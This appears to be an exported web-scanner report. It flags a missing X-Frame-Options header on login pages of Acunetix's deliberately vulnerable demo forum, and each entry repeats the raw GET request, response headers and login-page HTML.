<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D59" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=60 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D60" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=61 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D61" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=62 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D62" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=63 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D63" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=64 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D64" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=65 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D65" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=66 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:08 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D66" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 